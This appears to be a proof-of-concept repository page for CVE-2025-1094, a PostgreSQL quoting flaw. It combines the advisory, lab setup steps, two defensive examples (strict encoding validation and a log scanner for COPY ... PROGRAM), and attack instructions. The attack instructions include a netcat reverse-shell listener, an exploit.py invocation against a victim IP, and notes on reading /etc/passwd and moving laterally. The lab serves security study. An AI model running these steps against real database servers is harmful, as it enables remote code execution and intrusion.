
CVE-2025-1094 PoC — PostgreSQL quoting APIs miss neutralizing quoting syntax in text that fails encoding validation

Associated Vulnerability

Title: PostgreSQL quoting APIs miss neutralizing quoting syntax in text that fails encoding validation (CVE-2025-1094)

Description: Improper neutralization of quoting syntax in PostgreSQL libpq functions PQescapeLiteral(), PQescapeIdentifier(), PQescapeString(), and PQescapeStringConn() allows a database input provider to achieve SQL injection in certain usage patterns. Specifically, SQL injection requires the application to use the function result to construct input to psql, the PostgreSQL interactive terminal. Similarly, improper neutralization of quoting syntax in PostgreSQL command line utility programs allows a source of command line arguments to achieve SQL injection when client_encoding is BIG5 and server_encoding is one of EUC_TW or MULE_INTERNAL. Versions before PostgreSQL 17.3, 16.7, 15.11, 14.16, and 13.19 are affected.

Readme

# 🛠️ CVE-2025-1094 Lab Setup

> ⚠️ **Disclaimer**  
> This lab is for **educational and research purposes only**.  
> Do **NOT** use any of the information or techniques demonstrated here on systems you do not own or have explicit permission to test. Unauthorized use of these methods **may violate laws** and result in severe penalties.

---

## 📌 Overview

**CVE-2025-1094** is a critical vulnerability affecting **PostgreSQL**'s interactive tool **`psql`**, discovered in version **14.15** and earlier.  
It allows attackers to perform **SQL Injection**, which can lead to **Remote Code Execution (RCE)** under certain conditions.

---

## 🧨 Root Cause

The vulnerability arises from **improper handling of malformed UTF-8 input** in `psql`.  
Because the quoting routines assume their input is already valid in the client encoding, a byte sequence that fails encoding validation is not neutralized correctly. Attackers can then inject arbitrary SQL or `psql` meta-commands such as `\!` (shell escape), and even exploit `COPY ... TO PROGRAM` to run system commands.
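The ordering matters: encoding validation has to happen before quoting, because quote-doubling is only meaningful when the quoting code and the consumer (`psql` or the server) agree on where each character starts and ends. The helper below is an added example written for this page, not code from this repository or from libpq; it shows that ordering in Python with constructed inputs. `quote_literal_strict` and `is_valid_encoding` are hypothetical names.

```python
# Added example (not from the repository or libpq): validate the encoding
# of untrusted bytes *before* quoting them as a SQL literal, and reject
# anything that fails validation instead of passing it through.


def is_valid_encoding(raw: bytes, encoding: str = "utf-8") -> bool:
    """True when raw decodes without error under the given client encoding."""
    try:
        raw.decode(encoding, errors="strict")
        return True
    except UnicodeDecodeError:
        return False


def quote_literal_strict(raw: bytes, encoding: str = "utf-8") -> str:
    """Return raw as a single-quoted SQL literal, or raise ValueError.

    Quoting works by doubling single quotes. That is only safe when the
    quoting code and the consumer agree on character boundaries, which a
    malformed multibyte sequence breaks. So decoding is done strictly
    first; a truncated or invalid sequence is an error, never "mostly ok".
    """
    try:
        text = raw.decode(encoding, errors="strict")
    except UnicodeDecodeError as exc:
        raise ValueError(
            f"input is not valid {encoding}: {exc.reason} at byte {exc.start}"
        ) from exc
    # With standard_conforming_strings = on (the default), only the quote
    # character is special inside a plain '...' literal.
    return "'" + text.replace("'", "''") + "'"


if __name__ == "__main__":
    # Constructed test inputs: a quote-bearing name, a valid multibyte
    # character, and a truncated multibyte sequence (first two bytes of U+20AC).
    samples = [b"O'Brien", "é".encode("utf-8"), b"abc\xe2\x82"]
    for raw in samples:
        try:
            print(raw, "->", quote_literal_strict(raw))
        except ValueError as err:
            print(raw, "-> rejected:", err)
```

The rejection branch is the point: text that fails validation never reaches a quoting routine. In application code the stronger mitigation is to avoid building statement text at all and pass untrusted values as query parameters, which sidesteps quoting entirely; the helper is for the cases (such as generating input for `psql`) where string construction is unavoidable.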

---

## 🔥 Impact and Attack Scenarios

- **SQL Injection → RCE**: Malformed UTF-8 strings bypass validation and lead to arbitrary query execution.  
- **Abuse of `COPY TO PROGRAM`**: Attackers can execute arbitrary shell commands such as:
  - Reverse shells
  - Reading sensitive files (`/etc/passwd`)
  - Combining with other CVEs for full unauthenticated RCE  
- **Integration Risk**: Software using `psql` with untrusted input (e.g., BeyondTrust PRA, Remote Support) is particularly exposed.
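`COPY ... TO PROGRAM` and `COPY ... FROM PROGRAM` execute as the database server's operating-system user and are only permitted to superusers and members of `pg_execute_server_program`, which is why the lab's superuser login makes the scenarios above possible. Their appearance in statement logs is therefore a high-signal event worth alerting on. The scanner below is an added example for this page, not part of this repository: it extracts such statements from log lines in the shape of PostgreSQL's default `log_line_prefix` (`%m [%p] `), assuming `log_statement = 'all'` so that statements are logged. The sample lines are constructed, and `find_copy_program` is a hypothetical name.

```python
# Added example (not from the repository): flag COPY ... TO/FROM PROGRAM
# statements in PostgreSQL statement logs.
import re

# Constructed sample lines in the shape of the default log_line_prefix
# '%m [%p] ' followed by the log level and message. Not real captured logs.
SAMPLE_LOG = """\
2025-02-14 10:00:01.101 UTC [2211] LOG:  statement: SELECT * FROM users;
2025-02-14 10:00:02.202 UTC [2211] LOG:  statement: COPY users TO '/tmp/out.csv';
2025-02-14 10:00:03.303 UTC [2212] LOG:  statement: copy (select 1) to program 'id';
2025-02-14 10:00:04.404 UTC [2213] LOG:  statement: COPY scratch FROM PROGRAM 'hostname';
2025-02-14 10:00:05.505 UTC [2213] ERROR:  syntax error at or near "'" at character 9
"""

# timestamp, [pid], LEVEL:, message
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<level>[A-Z]+):\s+(?P<msg>.*)$"
)

# COPY <table-or-query> TO|FROM PROGRAM, case-insensitive. A plain file
# target (COPY ... TO '/path') does not match because PROGRAM never follows.
COPY_PROGRAM_RE = re.compile(
    r"\bCOPY\b.*?\b(?P<direction>TO|FROM)\s+PROGRAM\b",
    re.IGNORECASE | re.DOTALL,
)


def find_copy_program(log_text: str) -> list[dict]:
    """Return one record per logged statement that invokes COPY ... PROGRAM."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not m.group("msg").startswith("statement: "):
            continue  # not a logged statement (e.g. an ERROR line)
        stmt = m.group("msg")[len("statement: "):]
        cp = COPY_PROGRAM_RE.search(stmt)
        if cp:
            hits.append({
                "ts": m.group("ts"),
                "pid": int(m.group("pid")),
                "direction": cp.group("direction").upper(),
                "statement": stmt,
            })
    return hits


if __name__ == "__main__":
    for hit in find_copy_program(SAMPLE_LOG):
        print(f"{hit['ts']} pid={hit['pid']} COPY {hit['direction']} PROGRAM: {hit['statement']}")
```

Two caveats for real deployments: PostgreSQL continues long statements onto following lines that begin with a tab, so a production scanner must join those continuation lines before matching, and a custom `log_line_prefix` needs a matching `LINE_RE`. The server-side check that complements detection is reviewing which roles are superusers or hold `pg_execute_server_program`, since a non-privileged role cannot reach `COPY ... PROGRAM` at all.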

---

## 🧪 Lab Requirements

### 🐳 Victim (Ubuntu)

Install Docker:

```bash
sudo apt update
sudo apt install -y apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt update
sudo apt install -y docker-ce docker-ce-cli containerd.io
sudo systemctl enable --now docker
sudo usermod -aG docker $USER
```

👉 **Reboot** or **log out & log in again** to apply Docker group permissions.

---

### 🐍 Attacker (Kali)

Install Python and dependencies:

```bash
sudo apt install -y python3 python3-pip python3-psycopg2 netcat-traditional
```

✅ Ensure **network connectivity** between attacker and victim machines.

---

## ⚙️ Step 1 – Deploy Vulnerable PostgreSQL Container (Victim)

1. **Pull PostgreSQL 14.15 image**:

```bash
docker pull postgres:14.15
```

2. **Run the container**:

```bash
docker run --name vulnerable_postgres \
  -e POSTGRES_USER=postgres123 \
  -e POSTGRES_PASSWORD=StrongP@ssWord \
  -e POSTGRES_DB=labdb \
  -p 5432:5432 \
  -d postgres:14.15
```

3. **Wait ~5s for initialization**, then create a demo table:

```bash
docker exec -i vulnerable_postgres psql -U postgres123 -d labdb <<EOF
CREATE TABLE users (
  id SERIAL PRIMARY KEY,
  username TEXT,
  password TEXT
);
INSERT INTO users (username, password) VALUES ('admin', 'password123');
EOF
```

---

### ✅ Step 1.5 – Verify the container and database setup

After starting the container, verify everything is working with the following commands:

**1. Check that the PostgreSQL container is running:**

```bash
sudo docker ps
```

📌 You should see a container named `vulnerable_postgres` listening on port `5432`.

---

**2. Access the container and inspect the database:**

```bash
sudo docker exec -it vulnerable_postgres psql -U postgres123 -d labdb
```

Inside the `psql` shell, run:

```sql
SELECT * FROM users;
```

Expected output:

```
 id | username |  password
----+----------+-------------
  1 | admin    | password123
(1 row)
```

Exit from `psql`:

```
\q
```

✅ Now your vulnerable PostgreSQL instance is running and ready for exploitation.

---

**3. If the container was stopped, start it again:**

```bash
sudo docker start vulnerable_postgres
```

## 📡 Step 2 – Exploit from Attacker Machine

1. **Start a listener** on the attacker machine to catch the reverse shell:

```bash
nc -lvnp 4444
```

2. **Run the exploit script** (adjust IP and port if needed):

```bash
python3 exploit.py <Victim_IP> <Attacker_IP> <Attacker_PORT>
```

3. If successful, you'll receive a reverse shell from the vulnerable PostgreSQL container 🎉

```bash
[*] Connecting to PostgreSQL server...
[+] Connected successfully!
[*] Sending payload...
[✓] Payload executed! Check your Netcat listener for a shell.
```

---

## 🧰 Example Exploitation Flow

1. Inject malformed UTF-8 to bypass input validation  
2. Exploit `COPY ... TO PROGRAM` to execute arbitrary shell commands  
3. Reverse shell connects back to the attacker machine  
4. Escalate privileges or move laterally inside the environment

---

💡 **Tip:** You can snapshot this vulnerable container and reuse it later without rebuilding the environment.
File Snapshot

```
[4.0K] /data/pocs/43e1647e9c6b344a5b415dea8766394773856367
├── [1.7K] exploit.py
└── [4.8K] README.md

1 directory, 2 files
```